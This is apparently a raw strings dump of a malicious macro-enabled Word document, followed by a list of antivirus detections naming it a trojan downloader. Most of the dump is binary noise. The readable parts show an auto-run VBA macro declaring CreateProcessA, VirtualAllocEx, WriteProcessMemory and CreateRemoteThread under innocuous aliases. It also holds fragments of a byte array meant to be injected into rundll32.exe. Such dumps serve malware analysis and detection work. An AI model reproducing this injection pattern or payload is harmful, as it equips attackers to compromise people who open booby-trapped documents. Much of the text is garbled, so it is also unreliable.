s}g$Mp
IQ=UT<%
u4r"^d
U|Hl4>Og
zMjC[)0
k,NLa[
$1i6Jg
Nw"I|\
$h1Kj
[[i $x
66c" B
<BDS.9
w`wfw4v{^
gq6Kq6\41
.u/_2j
=[Y2^2
&@)Tju
C-/>Z`
`:Ua9f<.
`*^"$N
m(p`39
RFBRUd
AY461K_
Dp+]1&G
CECpod(
Microsoft Forms 2.0 Image
Embedded Object
Forms.Image.1
www.meitu.com
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
uMYmKHr
ndVb0q
FW<`N
8xG*zds
A3@BG(a
a!bNY2G_l
aBA$O2j2
MV=Z-R;
Agcgek.
MV{K-GQ
]j0i~6
5+y|Aw
5/xVO
xfYltkmb=:)
u[{][A
rn'z#e@
Z4W-au@
R]B48.
>nO^O<
hVu$HA
1=z7P:
}V]%ch
*5+i#)
e@R8^3
6p9S81
kr%Ee9
=1@Bj
22@Ddu<
nP8 }?
+I.L~z}
H0A'o
Jx,Z%
<zc<r9
wqoe$~I
#t~c
)%.`BI
O^2N{z
&Cg;FG=9
j7fCRI
V{dbIP
_eYZ@2
jSBDb\m
P;`p==q
>]6&Ll
TNI(2O\
<sie!V
nfy0]s
@mx{H
`}ON?
e9N? (
y^p'p{
k{{33J
2Io(@I*H
iE(Nyp
?A'.8ES
MMFUi:
PPtPepL
&Ik3_t<]
R3_ISg"
3T-\:S
$gC&">
Jm)a(?n
ETri~a
Z+{Bg;
\kRBe.I
fv`v`v
97;0;p
hNuv`v
#/"p1c
hNuv`v
I7&mRaG
E0)ZRh
@%!PmN
}t7BWmv<u
mId/lz
fd#HwAm6
Luv`v`
zK(:)Z
9W>;0v`
v,o$P*
"l(?nZ
+B7#`:
F/hJ1`
o`;`L
$rgL(f
KBqi^[4
Iiixb3
hNuv`v
.K+ury
qaVc6t
Ev2Jne
Y`]v,^
Baffa<^.
.zoQ.q
6ZNTGnN
Gr"]XF
yY6i2.
y?W4;0;
"xiZRd
2;0;0;
yta,&i
FL6"D$2
XDri>/
}v`v`v
?ygpF
_!8La
WY$EDt
M$?r"da
ZJE$?v
"O.yt;
XWGlB%+
d>#k;&6
y960JN
|So,Ky
d~N68l
gR:g`U
7fNzf3
lnGp?-W
*=k8d/
x1R{6e
sq1v/>
W%k*V%
l(%?Qu
J !ny;
yuU5=/Q#
UYe%.-
?,cvaf
\_gnW>5
?'%A!z
xkGhLs
an7N-Ju
6+j!9R
)1#B/7E5<s@S7p<5]#]
ibW\j9
404ln0
xdx6L4
Lk`a(xA
H!RMK~
"FC[eC
0$r$l2J
4ti,zh
f`'`!`"
,b|F\A
~Bc#lvqGA6GSK}F
zSTmVl
]nS3xr
A$]>?&.b
t@a]`Y
P@v A0
/(1%w#N
;jdz(V
QP!Ze^
*xaixb
+fe[!P\<A
v!Llr=
S-=&`b
&l#Ljz
a'xcHl
FxU~:>
Tx:R]Lg
Zui"fg*|
'"Pvtw
}P-4>%A8
"HSHg_F
Cx/9F2
:2~_ s
y p p p
t p p p p
nk`tSO
#DruWv
:s1N9Z)
Ol 5e,
I=*T2"
&,ZIu^
)ZiFbf
Hx|yD T%
@)6Wz(
I+0+uu
gx:G |
O~rMPi
zJLHCi
$Ef[ZMY
F%`E+M
Iu+5Z
Z.lZW@0
'1 hd,
N7_t9b
v!L=TERm
=`1Fxd
AFlz(?
0oqr!$qR
"<.$"$9
]}tdw|
XTmARa<
6beh-(
n-B,_C
a UORs
VPUg[2,
/_Bo=
6YIE$7K
vj";uh!\
:{L5,tw
A^P>eD
b)fmUP%%
1r :sv=r8:s
GNmnHw~
wc9Rf%;
_jw"f2
ll;#|h
|O}+?)
0<{>(<|
pbmf'B^
abM:LFyt
75l{l!5
1[gG))
jW7Fi^
D>!8WI
H:gf9w
/:5x&)
h/)9F.Ur
A>1 VA/
j/r".lE
KJEYnb
IVQ*__
Jg{t}Kw
tvgqm!^
U]\q(M
'\E/T
pzf%_i
tm)A_af
9O3v9r&k
CY b00
K"BE_8
.P~P&nR
'leG<
l`&PIY
)HDjeg
<fZz~
r;Uj6+1
q;[:`k6=
N~pBZ
P VIA}
^q3,(+Q
Iw[0?FbR
U6YN><
;pV73^
)t8%f2
!|3]W-3
6?v077
z _&;qtS
Or|1u3
s.IvjW
Z&w2 @
(o(/>i
UJu<J/(
CDG%_j
CL\:%uD
`$_Pq!
?1EDb1
v*tS4#:
2Q 5KZ|
2w\DsHU'
vLuVGsHSq
5ST/^T
.!G6lH
pBhCzC
{RnuW\K=7
,HO)/p
`#j'ic
5\8=LO
,yvjmMP
eGjBZx
*%S5EQ
}Pr2k>
GlR!9r
9):WxdeI
h=e"g#
DR8zXD
U;ezIv
&,l*E*
Y:s pO6
4~6:~&
(^Q+]r(u]
<it[}o
2&$AE$
q81F9U
k+k;@?:
.u/"S&
Qdckt2vCI
U^/e^J
Z\:$%9
eB0{gt
GV)4Fax
[{4E$o
qb8ouGGk~
I9j1J
6X'<)3T)xR;
3sj)*xJ
xg()*s
IU>!-O
U\MU(yq
NH3T^EI)h
*]tF~$*
K9~Bq8
J,)JHnm
32sb`f
?M,WSG
`+GUW\
2#KIQr
)BR"z$
*g^b5W
2@&XFN
Bwc%E9
*DI"D4O\T#
@I8%\D
M> TO7
1f1M>y
kxsz`X
k=DFD5f
av17Xe
Nlo,[0T
eWZBpw
Da.LW4
^^?jD?
0g1Tvo
27J^lp
6krcY<;
cEFFFF
Wxcp|u#8"
pH/n|@4D]
'$j&5E4
e6bYX[
+9nwI@P
Y/"py'
-plbH2[Zl
E7)Eb)
H2@.*O
ii)L[3
b be]S'mx0X
pJM(roe
7@Q[18ix*o
HU*u,B
X^&bUCIn
"%J>%Ly
$@cM']l
o}:fsL$
_]|xLa
+,Il+T6
jj%uuE
6!\z`F
7)m1l<)g
<#us.R
s}g$Mp
IQ=UT<%
u4r"^d
U|Hl4>Og
zMjC[)0
k,NLa[
$1i6Jg
Nw"I|\
$h1Kj
[[i $x
66c" B
<BDS.9
w`wfw4v{^
gq6Kq6\41
.u/_2j
=[Y2^2
&@)Tju
C-/>Z`
Normal.dotm
Microsoft Office Word
Image1, 0, 0, MSForms, Image
Attribut
e VB_Nam
e = "Thi
sDocumen
1Normal
VGlobal!
Pre decla
lateDeri
$Custom
Imag e1, 0
l Length As Long, ByVal LengthWrote As Long) As Long
Private Declare Function RunStuff Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, lpProcessAttributes As Any, lpThreadAttributes As Any, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, lpEnvironment As Any, ByVal lpCurrentDriectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long
CreateRemoteThread
VirtualAllocEx
WriteProcessMemory
CreateProcessA
Private Declare Function CreateStuff Lib "kernel32" Alias "CreateRemoteThread" (ByVal hProcess As Long, ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadID As Long) As Long
Private Declare Function AllocStuff Lib "kernel32" Alias "VirtualAllocEx" (ByVal hProcess As Long, ByVal lpAddr As Long, ByVal lSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteStuff Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lDest As Long, ByRef Source As Any, ByVa
ProgramW6432$
windir$
\\SysWOW64\\rundll32.exe
windir$
\\System32\\rundll32.exe
Attribut
e VB_Nam
e = "New
Macros"
ype PROC
ESS_INFO
RMATION
ess As L
STARTU&P
Reserve
lpDes0ktop
ntChar
d wFlag
howWindo
UIntege
hStdInpuFt
E0rror
A7 The
trSafe
Functio
uff Lib
"kernel3
2" Alias
" (ByVHal
dwSptack
r tAddr
r, lpPar
AdIAlloc
IV@irtual
xtecFH
@W\ri{@
M Ar>y_
f Sourc
lpComman
lepgV]
Environm
bnupInf>o
rD/+GY
F$iF
s?E_se?E?E
s?Eing
7Eri?Elp?E?
uto_@Open()
.ThisD
P.Ima ge1.T
Dim myBy
'myArra
"TVariant
, offse
(-4, -2
119, 0%
-27,$ 4
104, 58,
86, 121`, -89
B%7B6@Jd-5@
g"7aM *
If Len(
Environ(
"Program
W6432"))
> 0 The
windir
") & "\\ SysWO
rundll32 .exe"
RunStuf
f(sNull,
, ByVaPl 0&
Info,
Array),
For off(set
Write/
Workbhook
myArray
offset
pInfoR
sInfo:
sProcpJ`
rwxpage
Environ
AutoOpen
Workbook_Open
Documentj
Project
\G{00020
0046}#
2.0#0#C:
\Windows
\System3
e2.tlb
#OLE Aut
omation
ENormal
!Offic
DF8D04C-
5BFA-101@B-BDE5
ram File
s\Common
Microso
ft Share
d\OFFICE
16\MSO.D
M 16 .0 Ob
ibrary
D452EE1-
-02608C@4D0BB4
dFM20L'B
00}t#0B
B7BE7D-F
0D9-4A6F
6B90E389!
6User@
\AppData
\Local\T
emp\Word
bB7.ex
ThisDocu
ThisDocument
NewMacros
ID="{6895AAB0-3FF5-4235-A514-FC21F466E3D1}"
Document=ThisDocument/&H00000000
Module=NewMacros
Name="Project"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="92904AFBD9FFD9FFD9FFD9FF"
DPB="2527FD6C03FE04FE04FE"
GC="B8BA60936193616C"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
&H00000002={000209F2-0000-0000-C000-000000000046};Word8.0;&H00000000
[Workspace]
ThisDocument=0, 0, 0, 0, C
NewMacros=62, 62, 1650, 732,
Microsoft Word 97-2003
Win64x
stdole
Project-
ThisDocument<
_Evaluate
Normal
Office
MSFormsC
Image1_
NewMacros
checko
PROCESS_INFORMATION
hProcess
hThread
dwProcessId$
dwThreadId
STARTUPINFO
lpReserved
lpDesktop
lpTitle
dwXSize
dwYSize
dwXCountChars
dwYCountChars
dwFillAttribute$g`
dwFlags/
wShowWindow
cbReserved2
lpReserved2
hStdInput]
hStdOutput
hStdError0
CreateStuff
lpThreadAttributes
dwStackSize%F`
lpStartAddress
lpParameter
dwCreationFlags
lpThreadID
kernel32_
AllocStuffg
lpAddrZ
flAllocationType
flProtect
WriteStuff
lDestK
SourceG
LengthY
LengthWrote!m`
RunStuff
lpApplicationName
lpCommandLine
lpProcessAttributes`
bInheritHandles
lpEnvironmentp
lpCurrentDirectoryE
lpStartupInfo
lpProcessInformationui`
Auto_OpenV `
myByte
[Content_Types].xml
_rels/.rels
theme/theme/themeManager.xml
theme/theme/theme1.xml
Z77'd]
theme/theme/_rels/themeManager.xml.rels
K(M&$R(.1
[Content_Types].xmlPK
_rels/.relsPK
theme/theme/themeManager.xmlPK
theme/theme/theme1.xmlPK
theme/theme/_rels/themeManager.xml.relsPK
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
& 0 2 3 :
MSWordDoc
Word.Document.8
CONTROL Forms.Image.1 \s
Root Entry
WordDocument
ObjectPool
_1694103469
CompObj
ObjInfo
OCXNAME
Image1
contents
1Table
SummaryInformation
DocumentSummaryInformation
Macros
ThisDocument
NewMacros
(1Normal.ThisDocument
*\R8005*#72
_VBA_PROJECT
PROJECTwm
PROJECT
0000000046}#8.7#0#C:\Program Files\Microsoft Office\root\
tThisDocument
sNewMacros
*\G{87B7BE7D-F0D9-4
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\CNormal
*\CNormal
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
*\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\Windows\system32\FM20.DLL#Microsoft Forms 2.0 Object Library
*\G{87B7BE7D-F0D9-4A6F-9D7D-07AD6B90E389}#2.0#0#C:\Users\SLL\AppData\Local\Temp\Word8.0\MSForms.exd#Microsoft Forms 2.0 Object Library
ThisDocument
0;6345c3c5
ThisDocument
NewMacros
0@6345c463
NewMacros
Project.NewMacros.Auto_Open
Project.NewMacros.AutoOpen
Project.NewMacros.Workbook_Open
PROJECT.NEWMACROS.AUTOOPEN
PROJECT.NEWMACROS.AUTO_OPEN
PROJECT.NEWMACROS.WORKBOOK_OPEN
Unknown
Times New Roman
Symbol
_GB2312
DengXian
Light
Cambria Math
!%),.:;>?]}
CompObj
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Generic.a!c
Elastic malicious (high confidence)
DrWeb W97M.DownLoader.631
ClamAV Doc.Macro.Injection-6355574-0
CMC Clean
CAT-QuickHeal W97M.Donoff.B
ALYac Trojan.Downloader.DOC.Gen
Malwarebytes Clean
VIPRE Clean
Sangfor Malware.Generic-VBS.Save.f5fb1099
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren W97M/Agent.ACE.gen!Eldorado
Symantec Clean
ESET-NOD32 VBA/TrojanDownloader.Agent.WOE
TrendMicro-HouseCall W2KM_POWLOAD.SME
Avast VBA:Dropper-AK [Trj]
Cynet Malicious (score: 99)
Kaspersky UDS:DangerousObject.Multi.Generic
BitDefender VB:Trojan.Valyria.163
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
SUPERAntiSpyware Clean
MicroWorld-eScan VB:Trojan.Valyria.163
Tencent OLE.Win32.Macro.704456
Ad-Aware VB:Trojan.Valyria.163
Emsisoft VB:Trojan.Valyria.163 (B)
Comodo TrojWare.VBS.Crypt.BN@8aystx
F-Secure Clean
Baidu VBA.Trojan.Kryptik.d
Zillya Clean
TrendMicro W2KM_POWLOAD.SME
McAfee-GW-Edition BehavesLike.OLE2.Downloader.gb
FireEye VB:Trojan.Valyria.163
Sophos ATK/VbShlCde-A
SentinelOne Static AI - Malicious OLE
GData VB:Trojan.Valyria.163
Jiangmin Clean
Avira VBA/Dldr.Agent.dtfve
Antiy-AVL Trojan/Generic.ASMacro.2DA0F
Kingsoft Clean
Gridinsoft Clean
Arcabit VB:Trojan.Valyria.163
ViRobot DOC.Z.Agent.457216
ZoneAlarm Clean
Microsoft TrojanDownloader:O97M/Bartallex.AA
TACHYON Suspicious/W97M.MDRP.Gen
AhnLab-V3 VBA/Downloader.S12
Acronis Clean
McAfee RDN/Bartallex
MAX malware (ai score=100)
VBA32 Clean
Zoner Clean
Rising Macro.Agent.bn (CLASSIC)
Yandex Clean
Ikarus Trojan.VBA.Crypt
MaxSecure Clean
Fortinet VBA/Kryptik.A!tr
AVG VBA:Dropper-AK [Trj]
No IRMA results available.